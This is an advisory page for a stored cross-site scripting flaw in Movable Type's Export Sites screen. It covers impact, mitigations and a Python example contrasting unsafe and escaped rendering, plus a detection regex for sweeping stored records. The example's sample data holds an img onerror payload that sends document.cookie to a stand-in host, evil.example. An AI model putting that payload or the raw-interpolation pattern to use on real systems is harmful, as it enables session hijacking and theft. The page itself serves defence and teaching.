CVE-2026-22875: Cross-site scripting (XSS) in Six Apart Ltd. Movable Type (Software Edition)
Movable Type contains a stored cross-site scripting vulnerability in Export Sites. If crafted input is stored by an attacker, arbitrary script may be executed on a logged-in user's web browser. Note that Movable Type 7 series and 8.4 series, which are End-of-Life (EOL), are affected by the vulnerability as well.
AI Analysis
Technical Summary
CVE-2026-22875 is a stored cross-site scripting (XSS) vulnerability identified in Six Apart Ltd.'s Movable Type (Software Edition), specifically affecting versions 8.0.2 through 9.0.5 across multiple series (8.0, 8.8, and 9.0). The vulnerability resides in the Export Sites feature: input supplied by an attacker is stored without adequate sanitization and later rendered without adequate output encoding, so an attacker holding a low-privileged account (PR:L) can persist malicious HTML or JavaScript on the server. When a logged-in user, including an administrator, opens the affected Export Sites screen, that script executes in the victim's browser and session context, potentially leading to session hijacking, unauthorized actions performed with the victim's privileges, or data theft. Exploitation requires some level of privileges (PR:L) and user interaction (UI:R), but attack complexity is low (AC:L) and the attack vector is network-based (AV:N). The vulnerability affects confidentiality and integrity but does not impact availability. Notably, Movable Type versions 7 and 8.4, which are end-of-life, are also vulnerable but will not receive official patches. Although no exploits are currently reported in the wild, the presence of this vulnerability in actively maintained versions necessitates prompt remediation. The CVSS 3.0 score of 5.4 reflects a medium severity rating, balancing the potential impact against the exploitation requirements. Organizations using Movable Type should identify their deployed versions, apply the vendor's fixed releases, or implement compensating controls to mitigate risk.
Potential Impact
For European organizations, this vulnerability poses a moderate risk primarily to confidentiality and integrity of web applications using Movable Type CMS. Successful exploitation could allow attackers to steal session cookies, impersonate users, or perform unauthorized actions within the CMS environment. This is particularly concerning for organizations managing sensitive content or internal communications through Movable Type. Since the vulnerability requires user interaction and some privileges, the risk is somewhat mitigated but still significant in environments with multiple users or administrators. The presence of end-of-life versions in use increases risk due to lack of vendor support. Additionally, exploitation could facilitate lateral movement or further compromise if attackers leverage stolen credentials or session tokens. The impact on availability is minimal, but reputational damage and potential data breaches could have regulatory consequences under GDPR. Organizations relying on Movable Type for public-facing or internal portals should consider this vulnerability a priority for remediation to maintain security posture and compliance.
Mitigation Recommendations
1. Upgrade Movable Type installations to a fixed release of the 8.0, 8.8 or 9.0 series (later than the affected versions listed above) as published by Six Apart; apply vendor-provided patches as soon as they become available.
2. For end-of-life versions (7 and 8.4 series), which will not be patched, migrate to a supported series or to an alternative CMS platform to ensure ongoing security updates.
3. The underlying fix is context-appropriate output encoding of stored values when the Export Sites screens render them; this belongs in the vendor's release, so do not rely on hand-patching the installed code beyond a short-term stopgap that is replaced at the next upgrade.
4. Restrict the ability to create or edit the data shown in Export Sites, and access to the feature itself, to trusted users who require it, minimizing the attack surface.
5. Employ Content Security Policy (CSP) headers to limit the execution of unauthorized scripts in browsers. Roll the policy out in report-only mode first and confirm the Movable Type administration interface still functions, since a strict policy that blocks inline scripts can break CMS admin screens.
6. Conduct regular security audits and penetration testing focused on web application vulnerabilities, including XSS, with the CMS's authenticated, privileged screens in scope.
7. Educate users and administrators about the risks of clicking on suspicious links or interacting with untrusted content within the CMS, and about logging out of the CMS when it is not in use.
8. Monitor logs and user activity for unusual behavior that might indicate exploitation attempts. After upgrading, also audit site records created or edited by low-privileged accounts for injected markup: patching the renderer neutralizes stored payloads on display but does not remove them, and their presence identifies the account that planted them.
9. Use web application firewalls (WAFs) with rules designed to detect and block XSS payloads targeting Movable Type, treating this as defense in depth only: the payload is submitted over an authenticated path by a legitimate account, and generic XSS signatures may block legitimate content.
10. Ensure session management follows best practices (HttpOnly and SameSite cookie attributes, short session lifetimes, re-authentication for sensitive actions) to reduce the impact of stolen session tokens; note that script running inside the CMS can still perform actions as the victim even when the cookie itself cannot be read.
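The following is an added illustration, not code from Movable Type or Six Apart, of the three points above that matter most to a practitioner: how a stored value becomes script when interpolated raw into a listing, how per-context output encoding neutralizes it, and how to sweep already-stored records for injected markup after patching. The page does not say which Export Sites field is affected, so the `name` field, the record layout and the sample records (including the payload) are constructed for illustration only.

```python
"""Stored XSS in an export listing: vulnerable rendering, hardened
rendering, and a post-patch sweep of stored records.

Added example; not Movable Type's code. The 'name' field and the records
below are constructed, as is the payload."""
import html
import re

# Constructed rows standing in for sites an attacker with an ordinary
# (PR:L) account could have saved. Record 2 carries the illustrative
# payload; record 3 is legitimate but contains characters that must be
# encoded correctly.
SITES = [
    {"id": 1, "name": "Corporate Blog", "owner": "alice"},
    {"id": 2,
     "name": '<img src=x onerror="fetch(\'//evil.example/?c=\'+document.cookie)">',
     "owner": "mallory"},
    {"id": 3, "name": 'Quotes "and" <angles>', "owner": "bob"},
]


def render_row_unsafe(site):
    """Vulnerable pattern: the stored name is interpolated raw into both a
    text node and a double-quoted attribute, so any markup it contains is
    parsed as HTML by the viewer's browser."""
    return (f'<tr><td>{site["id"]}</td>'
            f'<td><a href="export?site={site["id"]}" title="{site["name"]}">'
            f'{site["name"]}</a></td></tr>')


def render_row_safe(site):
    """Hardened pattern: encode for the context the value lands in.
    html.escape(quote=True) turns < > & " ' into entities, which covers
    both the text node and the double-quoted attribute value; the numeric
    id is coerced to int so it cannot carry markup either."""
    name = html.escape(site["name"], quote=True)
    sid = int(site["id"])
    return (f'<tr><td>{sid}</td>'
            f'<td><a href="export?site={sid}" title="{name}">'
            f'{name}</a></td></tr>')


# Indicators of injected content: an opening tag from a set that can run
# script or load resources, an inline event handler, or a javascript: URL.
# Deliberately narrow so a name such as 'Quotes "and" <angles>' is not
# flagged; widen it if the sweep is too quiet for your data.
MARKUP_RE = re.compile(
    r'<\s*/?\s*(script|img|svg|iframe|object|embed|a|body|style|link|meta)\b'
    r'|\bon[a-z]+\s*='
    r'|javascript\s*:',
    re.IGNORECASE,
)


def find_injected_sites(sites):
    """Post-patch sweep. Upgrading fixes the renderer but leaves previously
    stored payloads in place; returning the owner with each hit gives the
    account to investigate."""
    return [(s["id"], s["owner"], s["name"])
            for s in sites if MARKUP_RE.search(s["name"])]


if __name__ == "__main__":
    for site in SITES:
        print("UNSAFE:", render_row_unsafe(site))
        print("SAFE:  ", render_row_safe(site))
    print("Suspicious records:", find_injected_sites(SITES))
```

Run over a real export of site records, the sweep's hits are review items, not confirmed compromise; the point is to tie each stored payload back to the account that created it, which a patch alone never tells you.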
Affected Countries
United Kingdom, Germany, France, Netherlands, Sweden
Technical Details
- Data Version: 5.2
- Assigner Short Name: jpcert
- Date Reserved: 2026-01-29T02:02:30.407Z
- CVSS Version: 3.0
- State: PUBLISHED
Threat ID: 6982f1fdf9fa50a62f73604a
Added to database: 2/4/2026, 7:15:09 AM
Last enriched: 2/4/2026, 7:30:09 AM
Last updated: 2/6/2026, 11:50:14 PM